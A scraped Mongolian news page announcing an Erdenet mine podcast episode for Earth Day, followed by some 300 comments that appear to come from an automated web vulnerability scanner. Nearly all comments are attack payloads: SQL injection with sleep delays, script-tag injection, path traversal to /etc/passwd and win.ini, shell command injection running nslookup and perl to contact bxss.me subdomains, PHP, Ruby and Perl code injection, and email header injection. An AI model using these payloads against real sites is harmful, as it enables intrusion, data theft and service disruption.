УУРХАЙЧИН ПОДКАСТ №36 - Г.ЭРДЭНЭТУЯА

“Уурхайчин подкаст” #36 Эх дэлхийн өдөрт зориулав Байгаль орчин, ногоон хөгжлийн хэлтсийн Байгаль орчин нөхөн сэргээх мэргэжилтэн Г.ЭРДЭНЭТУЯА: -Эрдэнэт үйлдвэр нь хоосон чулуулаг дээр нөхөн сэргээлт хийсэн анхны уурхай юм
Энэ мэдээ танд ямар санагдав?
Хайр татам байна
1
Таалагдаж байна
0
Гайхалтай байна
0
Гунигтай байна
0
Уур минь хүрч байна
2

Сэтгэгдэл (301)

wave
 • Guest1

  RDFYjolf

  2023-06-12 06:11 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:03 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:07 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:07 | P4CvgKEO

  1

 • GuesthGNOe3yu

  LgyxmpHT

  2023-06-13 02:07 | 192.168.234.14

  1

 • Guest1

  kAbCah8z

  2023-06-13 02:07 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:07 | 192.168.234.14

  0vhOIa8A

 • Guest1

  LgyxmpHT

  2023-06-13 02:07 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:07 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:07 | response.write(9839350*9916455)

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:07 | '+response.write(9839350*9916455)+'

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:07 | "+response.write(9839350*9916455)+"

  1

 • Guest

  LgyxmpHT

  2023-06-13 02:07 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:07 | '"

  1

 • Guest1

  2023-06-13 02:07 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:07 | <!--

  1

 • Guest'"

  LgyxmpHT

  2023-06-13 02:07 | 192.168.234.14

  1

 • Guest<!--

  LgyxmpHT

  2023-06-13 02:07 | 192.168.234.14

  1

 • Guest1

  '"

  2023-06-13 02:07 | 192.168.234.14

  1

 • Guest1

  <!--

  2023-06-13 02:07 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:07 | 192.168.234.14

  1

 • Guest1

  response.write(9644789*9642385)

  2023-06-13 02:07 | 192.168.234.14

  1

 • Guest1

  '+response.write(9644789*9642385)+'

  2023-06-13 02:07 | 192.168.234.14

  1

 • Guest1

  "+response.write(9644789*9642385)+"

  2023-06-13 02:07 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:07 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:07 | ../192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  '"

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  <!--

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  response.write(9409013*9810735)

 • Guest../1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  '+response.write(9409013*9810735)+'

 • Guest1

  ../../../../../../../../../../../../../../etc/passwd

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  "+response.write(9409013*9810735)+"

 • Guest1

  ../../../../../../../../../../../../../../windows/win.ini

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14&n990565=v996276

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  ../LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT&n972702=v929833

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1&n949086=v945683

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT%0abcc:009247.20-34785.20.3514b.19521.2@bxss.me

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  to@example.com>%0d%0abcc:009247.20-34786.20.3514b.19521.2@bxss.me

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | /xfs.bxss.me

  1

 • Guest946007

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1%0abcc:009247.20-34789.20.3514b.19521.2@bxss.me

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  to@example.com>%0d%0abcc:009247.20-34790.20.3514b.19521.2@bxss.me

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  /xfs.bxss.me

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT<esi:include src="http://bxss.me/rpb.png"/>

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1<esi:include src="http://bxss.me/rpb.png"/>

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | ${10000289+10000046}

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  /xfs.bxss.me

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  ${9999883+9999770}

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  ${9999339+9999872}

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  Y0ZLRWdjWng=

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  echo tkxgtk$()\ wxkznc\nz^xyu||a #' &echo tkxgtk$()\ wxkznc\nz^xyu||a #|" &echo tkxgtk$()\ wxkznc\nz^xyu||a #

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  &echo stjwie$()\ sduanu\nz^xyu||a #' &echo stjwie$()\ sduanu\nz^xyu||a #|" &echo stjwie$()\ sduanu\nz^xyu||a #

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  |echo rdjhug$()\ xgawic\nz^xyu||a #' |echo rdjhug$()\ xgawic\nz^xyu||a #|" |echo rdjhug$()\ xgawic\nz^xyu||a #

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  (nslookup hitahbdrfqjah8081f.bxss.me||perl -e "gethostbyname('hitahbdrfqjah8081f.bxss.me')")

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  $(nslookup hitkraqrnvagh5a714.bxss.me||perl -e "gethostbyname('hitkraqrnvagh5a714.bxss.me')")

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  &(nslookup hiteklarzelzuf05e8.bxss.me||perl -e "gethostbyname('hiteklarzelzuf05e8.bxss.me')")&'\"`0&(nslookup hiteklarzelzuf05e8.bxss.me||perl -e "gethostbyname('hiteklarzelzuf05e8.bxss.me')")&`'

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  |(nslookup hitleqabyhxpc8a932.bxss.me||perl -e "gethostbyname('hitleqabyhxpc8a932.bxss.me')")

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  `(nslookup hitewugryfzuu05c9f.bxss.me||perl -e "gethostbyname('hitewugryfzuu05c9f.bxss.me')")`

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | )

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | !(()&&!|*|*|

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | ^(#$!@#$)(()))******

  1

 • Guest)

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | Http://bxss.me/t/fit.txt

  1

 • Guest1

  )

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | http://bxss.me/t/fit.txt%3F.14

  1

 • Guest1

  !(()&&!|*|*|

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | bxss.me

  1

 • Guest1

  ^(#$!@#$)(()))******

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  )

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  !(()&&!|*|*|

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  ^(#$!@#$)(()))******

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  ../../../../../../../../../../../../../../etc/passwd

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guestbxss.me

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  echo lpjlsl$()\ ihragi\nz^xyu||a #' &echo lpjlsl$()\ ihragi\nz^xyu||a #|" &echo lpjlsl$()\ ihragi\nz^xyu||a #

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  ../../../../../../../../../../../../../../windows/win.ini

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  &echo widwla$()\ ppxabf\nz^xyu||a #' &echo widwla$()\ ppxabf\nz^xyu||a #|" &echo widwla$()\ ppxabf\nz^xyu||a #

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  1some_inexistent_file_with_long_name%00.jpg

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  |echo qfrnjj$()\ adirva\nz^xyu||a #' |echo qfrnjj$()\ adirva\nz^xyu||a #|" |echo qfrnjj$()\ adirva\nz^xyu||a #

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  ../1

 • Guest1

  Http://bxss.me/t/fit.txt

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  (nslookup hitzspjepqgxxe706d.bxss.me||perl -e "gethostbyname('hitzspjepqgxxe706d.bxss.me')")

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  http://bxss.me/t/fit.txt%3F.jpg

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  $(nslookup hitvuqazqyyff555d4.bxss.me||perl -e "gethostbyname('hitvuqazqyyff555d4.bxss.me')")

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  bxss.me

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  &(nslookup hithcxyxobvoy6e4bd.bxss.me||perl -e "gethostbyname('hithcxyxobvoy6e4bd.bxss.me')")&'\"`0&(nslookup hithcxyxobvoy6e4bd.bxss.me||perl -e "gethostbyname('hithcxyxobvoy6e4bd.bxss.me')")&`'

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  |(nslookup hitrpzuilqtwy6c29d.bxss.me||perl -e "gethostbyname('hitrpzuilqtwy6c29d.bxss.me')")

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  `(nslookup hitsjqvuzmhfsea102.bxss.me||perl -e "gethostbyname('hitsjqvuzmhfsea102.bxss.me')")`

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  ;(nslookup hitpfhurxlkcf20466.bxss.me||perl -e "gethostbyname('hitpfhurxlkcf20466.bxss.me')")|(nslookup hitpfhurxlkcf20466.bxss.me||perl -e "gethostbyname('hitpfhurxlkcf20466.bxss.me')")&(nslookup hitpfhurxlkcf20466.bxss.me||perl -e "gethostbyname('hitpfhurxlkcf20466.bxss.me')")

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | HttP://bxss.me/t/xss.html?%00

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | bxss.me/t/xss.html?%00

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  HttP://bxss.me/t/xss.html?%00

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  bxss.me/t/xss.html?%00

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1some_inexistent_file_with_long_name%00.jpg

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  Http://bxss.me/t/fit.txt

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  http://bxss.me/t/fit.txt%3F.jpg

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  bxss.me

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  HttP://bxss.me/t/xss.html?%00

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  bxss.me/t/xss.html?%00

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  "+"A".concat(70-3).concat(22*4).concat(112).concat(71).concat(117).concat(74)+(require"socket" Socket.gethostbyname("hitjc"+"cqgdxhhb5cabc.bxss.me.")[3].to_s)+"

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  '+'A'.concat(70-3).concat(22*4).concat(103).concat(83).concat(102).concat(69)+(require'socket' Socket.gethostbyname('hitrg'+'ftwdddptea519.bxss.me.')[3].to_s)+'

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  "+"A".concat(70-3).concat(22*4).concat(114).concat(78).concat(107).concat(75)+(require"socket" Socket.gethostbyname("hitou"+"aaachezmd6c02.bxss.me.")[3].to_s)+"

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  '+'A'.concat(70-3).concat(22*4).concat(115).concat(76).concat(109).concat(80)+(require'socket' Socket.gethostbyname('hitwc'+'dwhpvyisbfb2a.bxss.me.')[3].to_s)+'

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  '.gethostbyname(lc('hitvg'.'msywsbjb5d2fa.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(71).chr(113).chr(75).'

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  ".gethostbyname(lc("hitzt"."iwgnmerx534de.bxss.me."))."A".chr(67).chr(hex("58")).chr(121).chr(87).chr(105).chr(76)."

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | ';print(md5(31337));$a='

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | ";print(md5(31337));$a="

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | ${@print(md5(31337))}

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | ${@print(md5(31337))}\

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | '.print(md5(31337)).'

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  '.gethostbyname(lc('hityg'.'aahpwfoy06dd9.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(79).chr(110).chr(67).'

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  ".gethostbyname(lc("hitmb"."yzvvwsaqbcd68.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(87).chr(102).chr(88)."

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:08 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:09 | '"()&%<acx><ScRiPt >Da5X(9409)</ScRiPt>

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:09 | 192.168.234.149370994

  1

 • Guest19969639

  LgyxmpHT

  2023-06-13 02:09 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT'"()&%<acx><ScRiPt >Da5X(9128)</ScRiPt>

  2023-06-13 02:09 | 192.168.234.14

  1

 • Guest1

  '"()&%<acx><ScRiPt >Da5X(9119)</ScRiPt>

  2023-06-13 02:09 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT9361321

  2023-06-13 02:09 | 192.168.234.14

  1

 • Guest1

  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

  2023-06-13 02:09 | 192.168.234.14

  1

 • Guest1

  ';print(md5(31337));$a='

  2023-06-13 02:09 | 192.168.234.14

  1

 • Guest1

  ";print(md5(31337));$a="

  2023-06-13 02:09 | 192.168.234.14

  1

 • Guest1

  ${@print(md5(31337))}

  2023-06-13 02:09 | 192.168.234.14

  1

 • Guest1

  ${@print(md5(31337))}\

  2023-06-13 02:09 | 192.168.234.14

  1

 • Guest1

  '.print(md5(31337)).'

  2023-06-13 02:09 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:09 | 192.168.234.14

  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

 • Guest1

  LgyxmpHT

  2023-06-13 02:09 | 192.168.234.14

  ';print(md5(31337));$a='

 • Guest1

  LgyxmpHT

  2023-06-13 02:09 | 192.168.234.14

  ";print(md5(31337));$a="

 • Guest1

  LgyxmpHT

  2023-06-13 02:09 | 192.168.234.14

  ${@print(md5(31337))}

 • Guest1

  LgyxmpHT

  2023-06-13 02:09 | 192.168.234.14

  ${@print(md5(31337))}\

 • Guest1

  LgyxmpHT

  2023-06-13 02:09 | 192.168.234.14

  '.print(md5(31337)).'

 • Guest1

  LgyxmpHT

  2023-06-13 02:09 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:09 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:09 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:09 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:09 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:09 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:09 | 192.168.234.14

  1'"()&%<acx><ScRiPt >Da5X(9321)</ScRiPt>

 • Guest1

  LgyxmpHT

  2023-06-13 02:09 | 192.168.234.14

  '"()&%<acx><ScRiPt >Da5X(9685)</ScRiPt>

 • Guest1

  LgyxmpHT

  2023-06-13 02:09 | 192.168.234.14

  19965289

 • Guest1

  LgyxmpHT

  2023-06-13 02:09 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:09 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:09 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:10 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:11 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:13 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:13 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:14 | MPIwU1PO

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:14 | -1 OR 2+954-954-1=0+0+0+1 --

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:14 | -1 OR 2+89-89-1=0+0+0+1

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:14 | -1' OR 2+379-379-1=0+0+0+1 --

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:14 | -1" OR 2+332-332-1=0+0+0+1 --

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:14 | if(now()=sysdate(),sleep(15),0)

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:14 | 1 waitfor delay '0:0:15' --

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:14 | ijPYeMvh'; waitfor delay '0:0:15' --

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:15 | 1'"

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:15 | 1����%2527%2522

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:15 | @@vBU2X

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:15 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:15 | 192.168.234.14

  1

 • GuesthgHNfrrW

  LgyxmpHT

  2023-06-13 02:15 | 192.168.234.14

  1

 • Guest1'"

  LgyxmpHT

  2023-06-13 02:19 | 192.168.234.14

  1

 • Guest@@Wu8C7

  LgyxmpHT

  2023-06-13 02:19 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:19 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:19 | 192.168.234.14

  1

 • Guest1

  eKagAk5r

  2023-06-13 02:19 | 192.168.234.14

  1

 • Guest1

  -1 OR 2+819-819-1=0+0+0+1 --

  2023-06-13 02:19 | 192.168.234.14

  1

 • Guest1

  -1 OR 2+33-33-1=0+0+0+1

  2023-06-13 02:19 | 192.168.234.14

  1

 • Guest1

  -1' OR 2+181-181-1=0+0+0+1 --

  2023-06-13 02:19 | 192.168.234.14

  1

 • Guest1

  -1' OR 2+595-595-1=0+0+0+1 or 'opsMpHBm'='

  2023-06-13 02:19 | 192.168.234.14

  1

 • Guest1

  -1" OR 2+332-332-1=0+0+0+1 --

  2023-06-13 02:19 | 192.168.234.14

  1

 • Guest1

  if(now()=sysdate(),sleep(15),0)

  2023-06-13 02:20 | 192.168.234.14

  1

 • Guest1

  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  2023-06-13 02:20 | 192.168.234.14

  1

 • Guest1

  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  2023-06-13 02:20 | 192.168.234.14

  1

 • Guest1

  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  2023-06-13 02:21 | 192.168.234.14

  1

 • Guest1

  1 waitfor delay '0:0:15' --

  2023-06-13 02:21 | 192.168.234.14

  1

 • Guest1

  H19I0jrD'; waitfor delay '0:0:15' --

  2023-06-13 02:22 | 192.168.234.14

  1

 • Guest1

  CUGbwiik' OR 770=(SELECT 770 FROM PG_SLEEP(15))--

  2023-06-13 02:22 | 192.168.234.14

  1

 • Guest1

  1WwVHLwp') OR 990=(SELECT 990 FROM PG_SLEEP(15))--

  2023-06-13 02:23 | 192.168.234.14

  1

 • Guest1

  F0wA3XDk')) OR 596=(SELECT 596 FROM PG_SLEEP(15))--

  2023-06-13 02:23 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  2023-06-13 02:23 | 192.168.234.14

  1

 • Guest1

  1'"

  2023-06-13 02:23 | 192.168.234.14

  1

 • Guest1

  1����%2527%2522

  2023-06-13 02:23 | 192.168.234.14

  1

 • Guest1

  @@464vZ

  2023-06-13 02:23 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:32 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:33 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:33 | 192.168.234.14

  3buz7w0t

 • Guest1

  LgyxmpHT

  2023-06-13 02:33 | 192.168.234.14

  -1 OR 2+496-496-1=0+0+0+1 --

 • Guest1

  LgyxmpHT

  2023-06-13 02:33 | 192.168.234.14

  -1 OR 2+76-76-1=0+0+0+1

 • Guest1

  LgyxmpHT

  2023-06-13 02:33 | 192.168.234.14

  -1' OR 2+878-878-1=0+0+0+1 --

 • Guest1

  LgyxmpHT

  2023-06-13 02:33 | 192.168.234.14

  -1' OR 2+306-306-1=0+0+0+1 or 'RaF98zIS'='

 • Guest1

  LgyxmpHT

  2023-06-13 02:33 | 192.168.234.14

  -1" OR 2+938-938-1=0+0+0+1 --

 • Guest1

  LgyxmpHT

  2023-06-13 02:34 | 192.168.234.14

  if(now()=sysdate(),sleep(15),0)

 • Guest1

  LgyxmpHT

  2023-06-13 02:34 | 192.168.234.14

  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

 • Guest1

  LgyxmpHT

  2023-06-13 02:35 | 192.168.234.14

  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

 • Guest1

  LgyxmpHT

  2023-06-13 02:35 | 192.168.234.14

  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

 • Guest1

  LgyxmpHT

  2023-06-13 02:35 | 192.168.234.14

  -1; waitfor delay '0:0:15' --

 • Guest1

  LgyxmpHT

  2023-06-13 02:36 | 192.168.234.14

  -1); waitfor delay '0:0:15' --

 • Guest1

  LgyxmpHT

  2023-06-13 02:36 | 192.168.234.14

  1 waitfor delay '0:0:15' --

 • Guest1

  LgyxmpHT

  2023-06-13 02:36 | 192.168.234.14

